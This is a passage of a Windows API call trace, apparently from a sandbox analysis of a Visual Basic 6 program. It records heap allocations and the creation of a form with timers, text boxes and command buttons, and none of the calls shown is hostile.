(HeapHandle=0x2c70000, Flags=0x8, Size=0x178) returned 0x2c8aa38 [0165.203] GetCurrentThreadId () returned 0xba4 [0165.209] GetCurrentThreadId () returned 0xba4 [0165.209] GetCurrentThreadId () returned 0xba4 [0165.210] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x140) returned 0x2c8abb8 [0165.210] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x10) returned 0x2c81cc0 [0165.210] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x434) returned 0x2c8ad00 [0165.210] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x138 [0165.211] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x198) returned 0x2c8b140 [0165.211] GetVersionExA (in: lpVersionInformation=0x28f9b4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1c813c4, dwMinorVersion=0x28f904, dwBuildNumber=0x28fc00, dwPlatformId=0x28fea8, szCSDVersion="Í\x1e­w15Î\x01þÿÿÿ£<©wÎ<©w\x98\x01") | out: lpVersionInformation=0x28f9b4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0165.211] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0165.212] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82878 [0165.212] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x14) returned 0x2c82898 [0165.212] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x80) returned 0x2c8b2e0 [0165.212] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b2e0 | out: hHeap=0x2c70000) returned 1 [0165.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MS Sans Serif", cbMultiByte=-1, lpWideCharStr=0x28f9dc, cchWideChar=14 | out: lpWideCharStr="MS Sans Serif") returned 14 [0165.213] OleCreateFontIndirect () returned 0x0 [0165.215] LoadIconA (hInstance=0x72940000, lpIconName=0x4b1) returned 0x20153 [0165.216] OleCreatePictureIndirect () returned 0x0 [0165.217] lstrlenA (lpString="Form1") returned 5 [0165.217] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x6) returned 0x2c8b2e0 [0165.217] lstrlenA (lpString="ThunderRT6") returned 10 [0165.217] lstrcpyA (in: lpString1=0x28f9f0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.217] lstrlenA (lpString="ThunderRT6Form") returned 14 [0165.217] lstrcpynA (in: lpString1=0x28f9fe, lpString2="DC", iMaxLength=116 | out: lpString1="DC") returned="DC" [0165.217] lstrlenA (lpString="ThunderRT6") returned 10 [0165.217] lstrcpyA (in: lpString1=0x28f984, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.218] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Form", lpWndClass=0x28f9b0 | out: lpWndClass=0x28f9b0) returned 0 [0165.218] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0165.218] RegisterClassA (lpWndClass=0x28f9b0) returned 0x57c1c7 [0165.218] lstrlenA (lpString="ThunderRT6") returned 10 [0165.218] lstrcpyA (in: lpString1=0x28f984, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.218] lstrlenA (lpString="ThunderRT6Form") returned 14 [0165.218] lstrcpynA (in: lpString1=0x28f992, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0165.218] RegisterClassA (lpWndClass=0x28f9b0) returned 0x6ec1c9 [0165.219] AdjustWindowRectEx (in: lpRect=0x28fab0, dwStyle=0x2c80000, bMenu=0, dwExStyle=0x40000 | out: lpRect=0x28fab0) returned 1 [0165.219] CreateWindowExA (dwExStyle=0x40000, lpClassName=0xc1c9, lpWindowName=0x0, dwStyle=0x2c80000, X=-2147483648, Y=-2147483648, nWidth=347, nHeight=292, hWndParent=0x103de, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x103e6 [0165.224] NtdllDefWindowProc_A (hWnd=0x103e6, Msg=0x81, wParam=0x0, lParam=0x28f5d4) returned 0x1 [0165.225] NtdllDefWindowProc_A (hWnd=0x103e6, Msg=0x83, wParam=0x0, lParam=0x28f5c0) returned 0x0 [0165.226] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="dwmapi.dll", cbMultiByte=10, lpWideCharStr=0x28e048, cchWideChar=2047 | out: lpWideCharStr="dwmapi.dllޠ") returned 10 [0165.226] SysReAllocStringLen (in: pbstr=0x28f04c*=0x0, psz="dwmapi.dll", len=0xa | out: pbstr=0x28f04c*="dwmapi.dll") returned 1 [0165.226] CharLowerBuffW (in: lpsz="dwmapi.dll", cchLength=0xa | out: lpsz="dwmapi.dll") returned 0xa [0165.227] LoadLibraryExA (lpLibFileName="dwmapi.dll", hFile=0x0, dwFlags=0x0) returned 0x74490000 [0165.231] GetLastError () returned 0x0 [0165.232] SetLastError (dwErrCode=0x0) [0165.232] GetProcAddress (hModule=0x74490000, lpProcName="DwmIsCompositionEnabled") returned 0x74491610 [0165.232] GetSystemMenu (hWnd=0x103e6, bRevert=0) returned 0x202ad [0165.235] SetWindowContextHelpId (param_1=0x103e6, param_2=0xffffffff) returned 1 [0165.235] NtdllDefWindowProc_A (hWnd=0x103e6, Msg=0x1, wParam=0x0, lParam=0x28f5d4) returned 0x0 [0165.240] GetWindowRect (in: hWnd=0x103e6, lpRect=0x28fa74 | out: lpRect=0x28fa74) returned 1 [0165.240] GetDC (hWnd=0x103e6) returned 0x5010c57 [0165.240] GetTextMetricsA (in: hdc=0x5010c57, lptm=0x28f99c | out: lptm=0x28f99c) returned 1 [0165.240] SetBkMode (hdc=0x5010c57, mode=1) returned 2 [0165.240] OleTranslateColor () returned 0x0 [0165.240] SetBkColor (hdc=0x5010c57, color=0xf0f0f0) returned 0xffffff [0165.241] OleTranslateColor () returned 0x0 [0165.241] SetTextColor (hdc=0x5010c57, color=0x0) returned 0x0 [0165.241] OleTranslateColor () returned 0x0 [0165.241] CreatePen (iStyle=0, cWidth=1, color=0x0) returned 0xc300c54 [0165.241] SelectObject (hdc=0x5010c57, h=0xc300c54) returned 0x1b00017 [0165.241] SelectObject (hdc=0x5010c57, h=0x1900011) returned 0x1900010 [0165.241] ClientToScreen (in: hWnd=0x103e6, lpPoint=0x28f97c | out: lpPoint=0x28f97c) returned 1 [0165.241] SetBrushOrgEx (in: hdc=0x5010c57, x=4, y=2, lppt=0x0 | out: lppt=0x0) returned 1 [0165.241] UnrealizeObject (h=0x1900015) returned 1 [0165.241] SelectObject (hdc=0x5010c57, h=0x1900015) returned 0x1900011 [0165.242] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x14) returned 0x2c828b8 [0165.242] SelectObject (hdc=0x5010c57, h=0x180a0c4f) returned 0x18a002e [0165.242] GetTextMetricsA (in: hdc=0x5010c57, lptm=0x28f790 | out: lptm=0x28f790) returned 1 [0165.243] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xdc) returned 0x2c8b2f0 [0165.243] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c828d8 [0165.243] lstrlenA (lpString="ThunderRT6") returned 10 [0165.243] lstrcpyA (in: lpString1=0x28f9c0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.243] lstrlenA (lpString="ThunderRT6") returned 10 [0165.244] lstrcpyA (in: lpString1=0x28f954, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.244] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Timer", lpWndClass=0x28f980 | out: lpWndClass=0x28f980) returned 0 [0165.244] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0165.244] RegisterClassA (lpWndClass=0x28f980) returned 0x75c1c8 [0165.244] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1c8, lpWindowName=0x0, dwStyle=0x44010000, X=80, Y=24, nWidth=0, nHeight=0, hWndParent=0x103e6, hMenu=0x1, hInstance=0x72940000, lpParam=0x0) returned 0x103e8 [0165.244] SetTimer (hWnd=0x103e8, nIDEvent=0x103e8, uElapse=0x7530, lpTimerFunc=0x0) returned 0x103e8 [0165.245] NtdllDefWindowProc_A (hWnd=0x103e8, Msg=0x81, wParam=0x0, lParam=0x28f5a4) returned 0x1 [0165.245] NtdllDefWindowProc_A (hWnd=0x103e8, Msg=0x83, wParam=0x0, lParam=0x28f590) returned 0x0 [0165.245] NtdllDefWindowProc_A (hWnd=0x103e8, Msg=0x1, wParam=0x0, lParam=0x28f5a4) returned 0x0 [0165.246] NtdllDefWindowProc_A (hWnd=0x103e8, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0165.246] NtdllDefWindowProc_A (hWnd=0x103e8, Msg=0x3, wParam=0x0, lParam=0x180050) returned 0x0 [0165.246] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xdc) returned 0x2c8b3d8 [0165.246] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c828f8 [0165.246] lstrlenA (lpString="ThunderRT6") returned 10 [0165.246] lstrcpyA (in: lpString1=0x28f9c0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.246] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1c8, lpWindowName=0x0, dwStyle=0x44010000, X=48, Y=24, nWidth=0, nHeight=0, hWndParent=0x103e6, hMenu=0x2, hInstance=0x72940000, lpParam=0x0) returned 0x103ea [0165.247] SetTimer (hWnd=0x103ea, nIDEvent=0x103ea, uElapse=0x64, lpTimerFunc=0x0) returned 0x103ea [0165.247] NtdllDefWindowProc_A (hWnd=0x103ea, Msg=0x81, wParam=0x0, lParam=0x28f5a4) returned 0x1 [0165.247] NtdllDefWindowProc_A (hWnd=0x103ea, Msg=0x83, wParam=0x0, lParam=0x28f590) returned 0x0 [0165.248] NtdllDefWindowProc_A (hWnd=0x103ea, Msg=0x1, wParam=0x0, lParam=0x28f5a4) returned 0x0 [0165.248] NtdllDefWindowProc_A (hWnd=0x103ea, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0165.248] NtdllDefWindowProc_A (hWnd=0x103ea, Msg=0x3, wParam=0x0, lParam=0x180030) returned 0x0 [0165.249] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xf4) returned 0x2c8b4c0 [0165.249] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82918 [0165.249] lstrlenA (lpString="Text4") returned 5 [0165.249] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x6) returned 0x2c8b5c0 [0165.250] lstrlenA (lpString="ThunderRT6") returned 10 [0165.250] lstrcpyA (in: lpString1=0x28f9c0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.250] lstrlenA (lpString="ThunderRT6") returned 10 [0165.250] lstrcpyA (in: lpString1=0x28f954, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.250] GetClassInfoA (in: hInstance=0x0, lpClassName="Edit", lpWndClass=0x28f980 | out: lpWndClass=0x28f980) returned 1 [0165.250] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6TextBox", lpWndClass=0x28f980 | out: lpWndClass=0x28f980) returned 0 [0165.250] RegisterClassA (lpWndClass=0x28f980) returned 0x6ec1d6 [0165.251] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1d6, lpWindowName="Text4", dwStyle=0x440100e0, X=160, Y=0, nWidth=33, nHeight=19, hWndParent=0x103e6, hMenu=0x3, hInstance=0x72940000, lpParam=0x0) returned 0x103ec [0165.256] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0x81, wParam=0x0, lParam=0x28f5a4) returned 0x1 [0165.257] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0x83, wParam=0x0, lParam=0x28f590) returned 0x0 [0165.258] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0x1, wParam=0x0, lParam=0x28f5a4) returned 0x1 [0165.260] IsWindow (hWnd=0x103ec) returned 1 [0165.260] IsWindow (hWnd=0x103ec) returned 1 [0165.261] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0165.262] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0165.262] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0x3, wParam=0x0, lParam=0x200a2) returned 0x0 [0165.263] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x14) returned 0x2c82938 [0165.263] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0x30, wParam=0x180a0c4f, lParam=0x0) returned 0x1 [0165.264] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0165.264] ShowWindow (hWnd=0x103ec, nCmdShow=5) returned 0 [0165.264] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0165.264] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xf4) returned 0x2c8b5d0 [0165.264] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82958 [0165.265] lstrlenA (lpString="Text3") returned 5 [0165.265] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x6) returned 0x2c8b6d0 [0165.265] lstrlenA (lpString="ThunderRT6") returned 10 [0165.265] lstrcpyA (in: lpString1=0x28f9c0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.265] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1d6, lpWindowName="Text3", dwStyle=0x440100e0, X=120, Y=0, nWidth=33, nHeight=19, hWndParent=0x103e6, hMenu=0x4, hInstance=0x72940000, lpParam=0x0) returned 0x103ee [0165.265] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0x81, wParam=0x0, lParam=0x28f5a4) returned 0x1 [0165.266] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0x83, wParam=0x0, lParam=0x28f590) returned 0x0 [0165.271] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0x1, wParam=0x0, lParam=0x28f5a4) returned 0x1 [0165.271] IsWindow (hWnd=0x103ee) returned 1 [0165.272] IsWindow (hWnd=0x103ee) returned 1 [0165.272] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0165.273] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0165.273] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0x3, wParam=0x0, lParam=0x2007a) returned 0x0 [0165.273] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x14) returned 0x2c82978 [0165.273] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0x30, wParam=0x180a0c4f, lParam=0x0) returned 0x1 [0165.274] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0165.274] ShowWindow (hWnd=0x103ee, nCmdShow=5) returned 0 [0165.274] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0165.274] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xf4) returned 0x2c8b6e0 [0165.274] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82998 [0165.275] lstrlenA (lpString="Text2") returned 5 [0165.275] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x6) returned 0x2c8b7e0 [0165.275] lstrlenA (lpString="ThunderRT6") returned 10 [0165.275] lstrcpyA (in: lpString1=0x28f9c0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.275] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1d6, lpWindowName="Text2", dwStyle=0x440100e0, X=80, Y=0, nWidth=33, nHeight=19, hWndParent=0x103e6, hMenu=0x5, hInstance=0x72940000, lpParam=0x0) returned 0x103f0 [0165.276] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0x81, wParam=0x0, lParam=0x28f5a4) returned 0x1 [0165.276] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0x83, wParam=0x0, lParam=0x28f590) returned 0x0 [0165.277] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0x1, wParam=0x0, lParam=0x28f5a4) returned 0x1 [0165.277] IsWindow (hWnd=0x103f0) returned 1 [0165.278] IsWindow (hWnd=0x103f0) returned 1 [0165.278] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0165.279] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0165.279] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0x3, wParam=0x0, lParam=0x20052) returned 0x0 [0165.279] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x14) returned 0x2c829b8 [0165.280] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0x30, wParam=0x180a0c4f, lParam=0x0) returned 0x1 [0165.280] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0165.280] ShowWindow (hWnd=0x103f0, nCmdShow=5) returned 0 [0165.280] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0165.280] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xf4) returned 0x2c8b7f0 [0165.281] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c829d8 [0165.281] lstrlenA (lpString="Text1") returned 5 [0165.281] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x6) returned 0x2c8b8f0 [0165.281] lstrlenA (lpString="ThunderRT6") returned 10 [0165.281] lstrcpyA (in: lpString1=0x28f9c0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.281] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1d6, lpWindowName="Text1", dwStyle=0x440100e0, X=40, Y=0, nWidth=33, nHeight=19, hWndParent=0x103e6, hMenu=0x6, hInstance=0x72940000, lpParam=0x0) returned 0x103f2 [0165.282] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0x81, wParam=0x0, lParam=0x28f5a4) returned 0x1 [0165.287] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0x83, wParam=0x0, lParam=0x28f590) returned 0x0 [0165.287] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0x1, wParam=0x0, lParam=0x28f5a4) returned 0x1 [0165.288] IsWindow (hWnd=0x103f2) returned 1 [0165.288] IsWindow (hWnd=0x103f2) returned 1 [0165.288] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0165.289] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0165.289] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0x3, wParam=0x0, lParam=0x2002a) returned 0x0 [0165.290] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x14) returned 0x2c829f8 [0165.290] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0x30, wParam=0x180a0c4f, lParam=0x0) returned 0x1 [0165.290] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0165.290] ShowWindow (hWnd=0x103f2, nCmdShow=5) returned 0 [0165.291] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0165.291] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xdc) returned 0x2c8b900 [0165.291] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82a18 [0165.291] lstrlenA (lpString="Command3") returned 8 [0165.292] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x9) returned 0x2c81cd8 [0165.292] lstrlenA (lpString="ThunderRT6") returned 10 [0165.292] lstrcpyA (in: lpString1=0x28f9c0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.292] lstrlenA (lpString="ThunderRT6") returned 10 [0165.292] lstrcpyA (in: lpString1=0x28f954, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.292] GetClassInfoA (in: hInstance=0x0, lpClassName="Button", lpWndClass=0x28f980 | out: lpWndClass=0x28f980) returned 1 [0165.292] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6CommandButton", lpWndClass=0x28f980 | out: lpWndClass=0x28f980) returned 0 [0165.292] RegisterClassA (lpWndClass=0x28f980) returned 0x10c1d7 [0165.293] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1d7, lpWindowName="Command3", dwStyle=0x44012000, X=0, Y=48, nWidth=41, nHeight=25, hWndParent=0x103e6, hMenu=0x7, hInstance=0x72940000, lpParam=0x0) returned 0x103f4 [0165.293] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f4, Msg=0x81, wParam=0x0, lParam=0x28f5a4) returned 0x1 [0165.293] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f4, Msg=0x83, wParam=0x0, lParam=0x28f590) returned 0x0 [0165.294] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f4, Msg=0x1, wParam=0x0, lParam=0x28f5a4) returned 0x0 [0165.294] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f4, Msg=0x5, wParam=0x0, lParam=0x190029) returned 0x0 [0165.295] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f4, Msg=0x3, wParam=0x0, lParam=0x300000) returned 0x0 [0165.295] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x14) returned 0x2c82a38 [0165.295] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f4, Msg=0x30, wParam=0x180a0c4f, lParam=0x0) returned 0x0 [0165.296] ShowWindow (hWnd=0x103f4, nCmdShow=5) returned 0 [0165.296] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f4, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0165.296] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xdc) returned 0x2c8b9e8 [0165.296] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82a58 [0165.296] lstrlenA (lpString="Command2") returned 8 [0165.296] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x9) returned 0x2c81cf0 [0165.296] lstrlenA (lpString="ThunderRT6") returned 10 [0165.296] lstrcpyA (in: lpString1=0x28f9c0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.296] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1d7, lpWindowName="Command2", dwStyle=0x44012000, X=0, Y=24, nWidth=41, nHeight=25, hWndParent=0x103e6, hMenu=0x8, hInstance=0x72940000, lpParam=0x0) returned 0x103f6 [0165.297] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f6, Msg=0x81, wParam=0x0, lParam=0x28f5a4) returned 0x1 [0165.297] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f6, Msg=0x83, wParam=0x0, lParam=0x28f590) returned 0x0 [0165.303] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f6, Msg=0x1, wParam=0x0, lParam=0x28f5a4) returned 0x0 [0165.303] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f6, Msg=0x5, wParam=0x0, lParam=0x190029) returned 0x0 [0165.303] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f6, Msg=0x3, wParam=0x0, lParam=0x180000) returned 0x0 [0165.303] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x14) returned 0x2c82a78 [0165.304] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f6, Msg=0x30, wParam=0x180a0c4f, lParam=0x0) returned 0x0 [0165.304] ShowWindow (hWnd=0x103f6, nCmdShow=5) returned 0 [0165.304] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f6, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0165.304] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xdc) returned 0x2c8bad0 [0165.304] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82a98 [0165.304] lstrlenA (lpString="Command1") returned 8 [0165.304] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x9) returned 0x2c81d08 [0165.305] lstrlenA (lpString="ThunderRT6") returned 10 [0165.305] lstrcpyA (in: lpString1=0x28f9c0, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.305] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1d7, lpWindowName="Command1", dwStyle=0x44012000, X=0, Y=0, nWidth=41, nHeight=25, hWndParent=0x103e6, hMenu=0x9, hInstance=0x72940000, lpParam=0x0) returned 0x103f8 [0165.305] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f8, Msg=0x81, wParam=0x0, lParam=0x28f5a4) returned 0x1 [0165.306] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f8, Msg=0x83, wParam=0x0, lParam=0x28f590) returned 0x0 [0165.306] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f8, Msg=0x1, wParam=0x0, lParam=0x28f5a4) returned 0x0 [0165.306] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f8, Msg=0x5, wParam=0x0, lParam=0x190029) returned 0x0 [0165.307] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f8, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0165.307] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x14) returned 0x2c82ab8 [0165.307] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f8, Msg=0x30, wParam=0x180a0c4f, lParam=0x0) returned 0x0 [0165.307] ShowWindow (hWnd=0x103f8, nCmdShow=5) returned 0 [0165.307] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f8, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0165.308] GetClientRect (in: hWnd=0x103e6, lpRect=0x28fb30 | out: lpRect=0x28fb30) returned 1 [0165.308] MapWindowPoints (in: hWndFrom=0x103e6, hWndTo=0x0, lpPoints=0x28fb30, cPoints=0x2 | out: lpPoints=0x28fb30) returned 3276828 [0165.308] EqualRect (lprc1=0x28fb30, lprc2=0x28fb10) returned 1 [0165.308] SetEvent (hEvent=0x138) returned 1 [0165.308] IsIconic (hWnd=0x103e6) returned 0 [0165.308] SendMessageA (hWnd=0x103e6, Msg=0x80, wParam=0x1, lParam=0x20153) returned 0x0 [0165.309] NtdllDefWindowProc_A (hWnd=0x103e6, Msg=0x80, wParam=0x1, lParam=0x20153) returned 0x0 [0165.310] SysReAllocStringLen (in: pbstr=0x28eed4*=0x0, psz="MSVBVM60.DLL", len=0xc | out: pbstr=0x28eed4*="MSVBVM60.DLL") returned 1 [0165.310] CharLowerBuffW (in: lpsz="MSVBVM60.DLL", cchLength=0xc | out: lpsz="msvbvm60.dll") returned 0xc [0165.310] GetModuleHandleW (lpModuleName="C:\\Windows\\system32\\MSVBVM60.DLL") returned 0x72940000 [0165.312] NtdllDefWindowProc_A (hWnd=0x103e6, Msg=0xd, 